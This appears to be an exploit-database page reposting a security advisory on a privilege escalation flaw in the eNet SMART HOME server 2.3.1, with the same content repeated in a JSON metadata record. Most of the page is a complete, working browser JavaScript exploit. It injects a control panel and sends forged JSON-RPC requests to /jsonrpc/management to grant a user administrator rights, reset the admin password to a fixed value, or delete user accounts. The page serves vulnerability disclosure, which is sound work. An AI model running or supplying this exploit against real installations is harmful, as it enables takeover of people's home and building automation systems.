eNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation

Description

Title: eNet SMART HOME server 2.3.1 setUserGroup Remote Privilege Escalation Advisory ID: ZSL-2026-5975 Type: Local/Remote Impact: Privilege Escalation, Security Bypass Risk: 4/5 Release Date: 14.02.2026 Summary Two German specialists in building...

Visit Original Source

Basic Information

ID ZSL-2026-5975

Published Feb 14, 2026 at 00:00

Affected Product

Affected Versions <html><body><p>/*

eNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation

Vendor: Gira Giersiepen GmbH & Co. KG | ALBRECHT JUNG GmbH & Co. KG | Insta GmbH
Product web page: https://www.enet-smarthome.com
Affected version: 2.3.1 (46841)
2.2.1 (46056)

Summary: Two German specialists in building systems technology are jointly bringing
a new, wireless-based smart home system to the market. Gira and JUNG are the companies
behind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing
the system. All three of us are old hands when it comes to building automation, and
have a history of connecting buildings in an intelligent way that goes back as far as
the 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and
founded EIBA (now known as KNX). KNX is the first open global standard for home and
building automation. Through KNX, we have decisively shaped the development of intelligent
building systems technology – and this wealth of experience has now come together in
eNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and
offers end customers the basis for an easy-to-use and secure Smart Home and installation
engineers easily understandable and professional commissioning of the system.

Desc: The eNet Smart Home system suffers from a privilege escalation vulnerability due
to insufficient authorization checks in the JSON-RPC endpoint for user management. A
low-privileged user, can exploit the "setUserGroup" method by sending a crafted POST
request to /jsonrpc/management, specifying their own username and elevating it to the
"UG_ADMIN" group. This bypasses intended access controls, granting the attacker administrative
capabilities such as modifying device configurations, network settings, and potentially
compromising the entire smart home ecosystem.

Tested on: GNU/Linux 4.4.15 (ARMv7 revision 5)
Jetty(9.2.z-SNAPSHOT)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5975
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5975.php

07.02.2026

*/

const existingContainer = document.getElementById('exploitSnippet');
if (existingContainer) existingContainer.remove();

const currentProtocol = window.location.protocol.slice(0, -1);
const currentHost = window.location.hostname;
const currentPort = window.location.port || (currentProtocol === 'https' ? '443' : '80');

const urlParams = new URLSearchParams(window.location.search);
let defaultIcp = urlParams.get('icp') || '';

const formHtml = `
</p><div id="exploitSnippet" style="position: fixed;
bottom: 20px;
right: 20px;
width: 320px;
background: #2f343a;
color: #e4e7eb;
padding: 20px;
border: 1px solid #4a5560;
border-radius: 8px;
z-index: 9999;
overflow-y: auto;
max-height: 80vh;
font-family: Arial, sans-serif;
font-size: 14px;">
<h3 style="margin-top: 0;
color: #cfd8e3;">
eNet SMART HOME - DRE Exploit
</h3>
<label>Protocol:</label>
<select id="protocol" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;">
<option :="" value="https">
https://
</option>
<option :="" value="http">
http://
</option>
</select>
<label>Host/IP:</label>
<input id="host" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="${currentHost}"/>
<label>Port:</label>
<input id="port" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="${currentPort}"/>
<label>ICP:</label>
<input id="icp" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="${defaultIcp}"/>
<label>Action:</label>
<select id="action" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;">
<option value="elevate">Elevate Privileges</option>
<option value="reset">Reset Password</option>
<option value="delete">Delete User</option>
</select>
<div id="elevateFields">
<label>User Name:</label>
<input id="userName" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="zeroscience"/>
<label>User Group:</label>
<select id="userGroup" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;">
<option value="UG_USER">UG_USER (lower privs)</option>
<option value="UG_ADMIN">UG_ADMIN</option>
</select>
</div>
<div id="resetFields" style="display: none;">
<label>User Name:</label>
<input id="resetUserName" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="admin"/>
<label>Default Password:</label>
<input id="defaultPassword" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="12345678"/>
</div>
<div id="deleteFields" style="display: none;">
<label>User Name:</label>
<input id="deleteUserName" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="zeroscience"/>
</div>
<label>Request ID:</label>
<input id="requestId" style="width: 100%;
margin-bottom: 12px;
background: #3b4148;
color: #e4e7eb;
border: 1px solid #56606b;
border-radius: 4px;
padding: 6px;" type="text" value="14"/>
<button id="runButton" style="background: #3a6ea5;
color: #ffffff;
border: 1px solid #2e5d8c;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
margin-right: 10px;" type="button">
RUN
</button>
<button id="closeButton" style="background: #5c6773;
color: #ffffff;
border: 1px solid #49525c;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;" type="button">
Close
</button>
<div id="responseOutput" style="margin-top: 12px;
white-space: pre-wrap;
background: #252a30;
color: #d6dde5;
padding: 10px;
border: 1px solid #4a5560;
border-radius: 4px;
max-height: 200px;
overflow-y: auto;">
</div>
</div>
`;

document.body.insertAdjacentHTML('beforeend', formHtml);

const actionSelect = document.getElementById('action');
const runButton = document.getElementById('runButton');
const closeButton = document.getElementById('closeButton');
const responseOutput = document.getElementById('responseOutput');
const elevateFields = document.getElementById('elevateFields');
const resetFields = document.getElementById('resetFields');
const deleteFields = document.getElementById('deleteFields');
const requestIdInput = document.getElementById('requestId');

const updateFields = (value) => {
elevateFields.style.display = value === 'elevate' ? 'block' : 'none';
resetFields.style.display = value === 'reset' ? 'block' : 'none';
deleteFields.style.display = value === 'delete' ? 'block' : 'none';

let defaultId = '14';
if (value === 'reset') defaultId = '15';
if (value === 'delete') defaultId = '6';
requestIdInput.value = defaultId;
};

actionSelect.addEventListener('change', (e) => updateFields(e.target.value));

updateFields(actionSelect.value);

runButton.addEventListener('click', () => {
const protocol = document.getElementById('protocol').value;
const host = document.getElementById('host').value;
const port = document.getElementById('port').value;
const icp = document.getElementById('icp').value;
const action = actionSelect.value;
const requestId = requestIdInput.value;

if (!icp) {
responseOutput.textContent = 'Error: ICP is required.';
console.error('ICP is required.');
return;
}

responseOutput.textContent = 'Loading...';

let method, params;
if (action === 'elevate') {
method = 'setUserGroup';
params = {
userName: document.getElementById('userName').value,
userGroup: document.getElementById('userGroup').value
};
} else if (action === 'reset') {
method = 'resetUserPassword';
params = {
userName: document.getElementById('resetUserName').value,
defaultPassword: document.getElementById('defaultPassword').value
};
} else if (action === 'delete') {
method = 'deleteUserAccount';
params = {
userName: document.getElementById('deleteUserName').value
};
}

const baseUrl = `${protocol}://${host}:${port}`;
const customReferer = `${baseUrl}/serverconfiguration.html?icp=${icp}#Usermanagement`;
const fetchUrl = `${baseUrl}/jsonrpc/management`;

const body = JSON.stringify({
"jsonrpc": "2.0",
"method": method,
"params": params,
"id": requestId
});

console.log('Sending request to:', fetchUrl);
console.log('With Referer:', customReferer);
console.log('Body:', body);

const timeoutPromise = new Promise((_, reject) =>
setTimeout(() => reject(new Error('Request timed out')), 10000)
);

Promise.race([timeoutPromise, fetch(fetchUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json; charset=utf-8',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'ku-MK,ku;j=1.7',
'Accept': '*/*'
},
body: body,
credentials: 'include',
referrer: customReferer,
referrerPolicy: 'unsafe-url'
})])
.then(response => {
if (response instanceof Error) throw response;
console.log('Response status:', response.status);
if (!response.ok) {
throw new Error(`HTTP error! Status: ${response.status}`);
}
return response.json();
})
.then(data => {
const successMsg = `Success: ${JSON.stringify(data, null, 2)}`;
responseOutput.textContent = successMsg;
console.log(successMsg);
setTimeout(() => location.reload(), 2000);
})
.catch(error => {
const errorMsg = `Error: ${error.message}`;
responseOutput.textContent = errorMsg;
console.error(errorMsg);
});
});

closeButton.addEventListener('click', () => {
console.log('Closing form...');
const container = document.getElementById('exploitSnippet');
if (container) {
container.remove();
console.log('Form closed.');
} else {
console.log('Form not found.');
}
});
</body></html>

{
    "lastseen": "2026-02-15T03:15:16",
    "description": "Title: eNet SMART HOME server 2.3.1 setUserGroup Remote Privilege Escalation Advisory ID: ZSL-2026-5975 Type: Local/Remote Impact: Privilege Escalation, Security Bypass Risk: 4/5 Release Date: 14.02.2026 Summary Two German specialists in building...",
    "published": "2026-02-14T00:00:00",
    "modified": "2026-02-14T00:00:00",
    "type": "zeroscience",
    "title": "eNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation",
    "source": "",
    "references": "",
    "id": "ZSL-2026-5975",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "<html><body><p>/*\r\n\r\neNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation\r\n\r\n\r\nVendor: Gira Giersiepen GmbH & Co. KG | ALBRECHT JUNG GmbH & Co. KG | Insta GmbH\r\nProduct web page: https://www.enet-smarthome.com\r\nAffected version: 2.3.1 (46841)\r\n                  2.2.1 (46056)\r\n\r\nSummary: Two German specialists in building systems technology are jointly bringing\r\na new, wireless-based smart home system to the market. Gira and JUNG are the companies\r\nbehind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing\r\nthe system. All three of us are old hands when it comes to building automation, and\r\nhave a history of connecting buildings in an intelligent way that goes back as far as\r\nthe 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and\r\nfounded EIBA (now known as KNX). KNX is the first open global standard for home and\r\nbuilding automation. Through KNX, we have decisively shaped the development of intelligent\r\nbuilding systems technology \u2013 and this wealth of experience has now come together in\r\neNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and\r\noffers end customers the basis for an easy-to-use and secure Smart Home and installation\r\nengineers easily understandable and professional commissioning of the system.\r\n\r\nDesc: The eNet Smart Home system suffers from a privilege escalation vulnerability due\r\nto insufficient authorization checks in the JSON-RPC endpoint for user management. A\r\nlow-privileged user, can exploit the \"setUserGroup\" method by sending a crafted POST\r\nrequest to /jsonrpc/management, specifying their own username and elevating it to the\r\n\"UG_ADMIN\" group. This bypasses intended access controls, granting the attacker administrative\r\ncapabilities such as modifying device configurations, network settings, and potentially\r\ncompromising the entire smart home ecosystem.\r\n\r\nTested on: GNU/Linux 4.4.15 (ARMv7 revision 5)\r\n           Jetty(9.2.z-SNAPSHOT)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n                            @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2026-5975\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5975.php\r\n\r\n\r\n07.02.2026\r\n\r\n*/\r\n\r\n\r\nconst existingContainer = document.getElementById('exploitSnippet');\r\nif (existingContainer) existingContainer.remove();\r\n\r\nconst currentProtocol = window.location.protocol.slice(0, -1);\r\nconst currentHost = window.location.hostname;\r\nconst currentPort = window.location.port || (currentProtocol === 'https' ? '443' : '80');\r\n\r\nconst urlParams = new URLSearchParams(window.location.search);\r\nlet defaultIcp = urlParams.get('icp') || '';\r\n\r\nconst formHtml = `\r\n</p><div id=\"exploitSnippet\" style=\"position: fixed;\r\n            bottom: 20px;\r\n            right: 20px;\r\n            width: 320px;\r\n            background: #2f343a;\r\n            color: #e4e7eb;\r\n            padding: 20px;\r\n            border: 1px solid #4a5560;\r\n            border-radius: 8px;\r\n            z-index: 9999;\r\n            overflow-y: auto;\r\n            max-height: 80vh;\r\n            font-family: Arial, sans-serif;\r\n            font-size: 14px;\">\n<h3 style=\"margin-top: 0;\r\n             color: #cfd8e3;\">\r\n    eNet SMART HOME - DRE Exploit\r\n  </h3>\n<label>Protocol:</label>\n<select id=\"protocol\" style=\"width: 100%;\r\n                 margin-bottom: 12px;\r\n                 background: #3b4148;\r\n                 color: #e4e7eb;\r\n                 border: 1px solid #56606b;\r\n                 border-radius: 4px;\r\n                 padding: 6px;\">\n<option :=\"\" value=\"https\">\r\n      https://\r\n    </option>\n<option :=\"\" value=\"http\">\r\n      http://\r\n    </option>\n</select>\n<label>Host/IP:</label>\n<input id=\"host\" style=\"width: 100%;\r\n                margin-bottom: 12px;\r\n                background: #3b4148;\r\n                color: #e4e7eb;\r\n                border: 1px solid #56606b;\r\n                border-radius: 4px;\r\n                padding: 6px;\" type=\"text\" value=\"${currentHost}\"/>\n<label>Port:</label>\n<input id=\"port\" style=\"width: 100%;\r\n                margin-bottom: 12px;\r\n                background: #3b4148;\r\n                color: #e4e7eb;\r\n                border: 1px solid #56606b;\r\n                border-radius: 4px;\r\n                padding: 6px;\" type=\"text\" value=\"${currentPort}\"/>\n<label>ICP:</label>\n<input id=\"icp\" style=\"width: 100%;\r\n                margin-bottom: 12px;\r\n                background: #3b4148;\r\n                color: #e4e7eb;\r\n                border: 1px solid #56606b;\r\n                border-radius: 4px;\r\n                padding: 6px;\" type=\"text\" value=\"${defaultIcp}\"/>\n<label>Action:</label>\n<select id=\"action\" style=\"width: 100%;\r\n                 margin-bottom: 12px;\r\n                 background: #3b4148;\r\n                 color: #e4e7eb;\r\n                 border: 1px solid #56606b;\r\n                 border-radius: 4px;\r\n                 padding: 6px;\">\n<option value=\"elevate\">Elevate Privileges</option>\n<option value=\"reset\">Reset Password</option>\n<option value=\"delete\">Delete User</option>\n</select>\n<div id=\"elevateFields\">\n<label>User Name:</label>\n<input id=\"userName\" style=\"width: 100%;\r\n                  margin-bottom: 12px;\r\n                  background: #3b4148;\r\n                  color: #e4e7eb;\r\n                  border: 1px solid #56606b;\r\n                  border-radius: 4px;\r\n                  padding: 6px;\" type=\"text\" value=\"zeroscience\"/>\n<label>User Group:</label>\n<select id=\"userGroup\" style=\"width: 100%;\r\n                   margin-bottom: 12px;\r\n                   background: #3b4148;\r\n                   color: #e4e7eb;\r\n                   border: 1px solid #56606b;\r\n                   border-radius: 4px;\r\n                   padding: 6px;\">\n<option value=\"UG_USER\">UG_USER (lower privs)</option>\n<option value=\"UG_ADMIN\">UG_ADMIN</option>\n</select>\n</div>\n<div id=\"resetFields\" style=\"display: none;\">\n<label>User Name:</label>\n<input id=\"resetUserName\" style=\"width: 100%;\r\n                  margin-bottom: 12px;\r\n                  background: #3b4148;\r\n                  color: #e4e7eb;\r\n                  border: 1px solid #56606b;\r\n                  border-radius: 4px;\r\n                  padding: 6px;\" type=\"text\" value=\"admin\"/>\n<label>Default Password:</label>\n<input id=\"defaultPassword\" style=\"width: 100%;\r\n                  margin-bottom: 12px;\r\n                  background: #3b4148;\r\n                  color: #e4e7eb;\r\n                  border: 1px solid #56606b;\r\n                  border-radius: 4px;\r\n                  padding: 6px;\" type=\"text\" value=\"12345678\"/>\n</div>\n<div id=\"deleteFields\" style=\"display: none;\">\n<label>User Name:</label>\n<input id=\"deleteUserName\" style=\"width: 100%;\r\n                  margin-bottom: 12px;\r\n                  background: #3b4148;\r\n                  color: #e4e7eb;\r\n                  border: 1px solid #56606b;\r\n                  border-radius: 4px;\r\n                  padding: 6px;\" type=\"text\" value=\"zeroscience\"/>\n</div>\n<label>Request ID:</label>\n<input id=\"requestId\" style=\"width: 100%;\r\n                margin-bottom: 12px;\r\n                background: #3b4148;\r\n                color: #e4e7eb;\r\n                border: 1px solid #56606b;\r\n                border-radius: 4px;\r\n                padding: 6px;\" type=\"text\" value=\"14\"/>\n<button id=\"runButton\" style=\"background: #3a6ea5;\r\n                 color: #ffffff;\r\n                 border: 1px solid #2e5d8c;\r\n                 padding: 8px 16px;\r\n                 border-radius: 4px;\r\n                 cursor: pointer;\r\n                 margin-right: 10px;\" type=\"button\">\r\n    RUN\r\n  </button>\n<button id=\"closeButton\" style=\"background: #5c6773;\r\n                 color: #ffffff;\r\n                 border: 1px solid #49525c;\r\n                 padding: 8px 16px;\r\n                 border-radius: 4px;\r\n                 cursor: pointer;\" type=\"button\">\r\n    Close\r\n  </button>\n<div id=\"responseOutput\" style=\"margin-top: 12px;\r\n              white-space: pre-wrap;\r\n              background: #252a30;\r\n              color: #d6dde5;\r\n              padding: 10px;\r\n              border: 1px solid #4a5560;\r\n              border-radius: 4px;\r\n              max-height: 200px;\r\n              overflow-y: auto;\">\n</div>\n</div>\r\n`;\r\n\r\ndocument.body.insertAdjacentHTML('beforeend', formHtml);\r\n\r\nconst actionSelect = document.getElementById('action');\r\nconst runButton = document.getElementById('runButton');\r\nconst closeButton = document.getElementById('closeButton');\r\nconst responseOutput = document.getElementById('responseOutput');\r\nconst elevateFields = document.getElementById('elevateFields');\r\nconst resetFields = document.getElementById('resetFields');\r\nconst deleteFields = document.getElementById('deleteFields');\r\nconst requestIdInput = document.getElementById('requestId');\r\n\r\nconst updateFields = (value) => {\r\n  elevateFields.style.display = value === 'elevate' ? 'block' : 'none';\r\n  resetFields.style.display = value === 'reset' ? 'block' : 'none';\r\n  deleteFields.style.display = value === 'delete' ? 'block' : 'none';\r\n  \r\n  let defaultId = '14';\r\n  if (value === 'reset') defaultId = '15';\r\n  if (value === 'delete') defaultId = '6';\r\n  requestIdInput.value = defaultId;\r\n};\r\n\r\nactionSelect.addEventListener('change', (e) => updateFields(e.target.value));\r\n\r\nupdateFields(actionSelect.value);\r\n\r\nrunButton.addEventListener('click', () => {\r\n  const protocol = document.getElementById('protocol').value;\r\n  const host = document.getElementById('host').value;\r\n  const port = document.getElementById('port').value;\r\n  const icp = document.getElementById('icp').value;\r\n  const action = actionSelect.value;\r\n  const requestId = requestIdInput.value;\r\n\r\n  if (!icp) {\r\n    responseOutput.textContent = 'Error: ICP is required.';\r\n    console.error('ICP is required.');\r\n    return;\r\n  }\r\n\r\n  responseOutput.textContent = 'Loading...';\r\n\r\n  let method, params;\r\n  if (action === 'elevate') {\r\n    method = 'setUserGroup';\r\n    params = {\r\n      userName: document.getElementById('userName').value,\r\n      userGroup: document.getElementById('userGroup').value\r\n    };\r\n  } else if (action === 'reset') {\r\n    method = 'resetUserPassword';\r\n    params = {\r\n      userName: document.getElementById('resetUserName').value,\r\n      defaultPassword: document.getElementById('defaultPassword').value\r\n    };\r\n  } else if (action === 'delete') {\r\n    method = 'deleteUserAccount';\r\n    params = {\r\n      userName: document.getElementById('deleteUserName').value\r\n    };\r\n  }\r\n\r\n  const baseUrl = `${protocol}://${host}:${port}`;\r\n  const customReferer = `${baseUrl}/serverconfiguration.html?icp=${icp}#Usermanagement`;\r\n  const fetchUrl = `${baseUrl}/jsonrpc/management`;\r\n\r\n  const body = JSON.stringify({\r\n    \"jsonrpc\": \"2.0\",\r\n    \"method\": method,\r\n    \"params\": params,\r\n    \"id\": requestId\r\n  });\r\n\r\n  console.log('Sending request to:', fetchUrl);\r\n  console.log('With Referer:', customReferer);\r\n  console.log('Body:', body);\r\n\r\n  const timeoutPromise = new Promise((_, reject) => \r\n    setTimeout(() => reject(new Error('Request timed out')), 10000)\r\n  );\r\n\r\n  Promise.race([timeoutPromise, fetch(fetchUrl, {\r\n    method: 'POST',\r\n    headers: {\r\n      'Content-Type': 'application/json; charset=utf-8',\r\n      'Accept-Encoding': 'gzip, deflate, br',\r\n      'Accept-Language': 'ku-MK,ku;j=1.7',\r\n      'Accept': '*/*'\r\n    },\r\n    body: body,\r\n    credentials: 'include',\r\n    referrer: customReferer,\r\n    referrerPolicy: 'unsafe-url'\r\n  })])\r\n  .then(response => {\r\n    if (response instanceof Error) throw response;\r\n    console.log('Response status:', response.status);\r\n    if (!response.ok) {\r\n      throw new Error(`HTTP error! Status: ${response.status}`);\r\n    }\r\n    return response.json();\r\n  })\r\n  .then(data => {\r\n    const successMsg = `Success: ${JSON.stringify(data, null, 2)}`;\r\n    responseOutput.textContent = successMsg;\r\n    console.log(successMsg);\r\n    setTimeout(() => location.reload(), 2000);\r\n  })\r\n  .catch(error => {\r\n    const errorMsg = `Error: ${error.message}`;\r\n    responseOutput.textContent = errorMsg;\r\n    console.error(errorMsg);\r\n  });\r\n});\r\n\r\ncloseButton.addEventListener('click', () => {\r\n  console.log('Closing form...');\r\n  const container = document.getElementById('exploitSnippet');\r\n  if (container) {\r\n    container.remove();\r\n    console.log('Form closed.');\r\n  } else {\r\n    console.log('Form not found.');\r\n  }\r\n});\r\n</body></html>",
    "sourceHref": "http://zeroscience.mk/codes/enet_privs.txt",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2026-5975.php",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

eNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation_ZSL-2026-5975

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply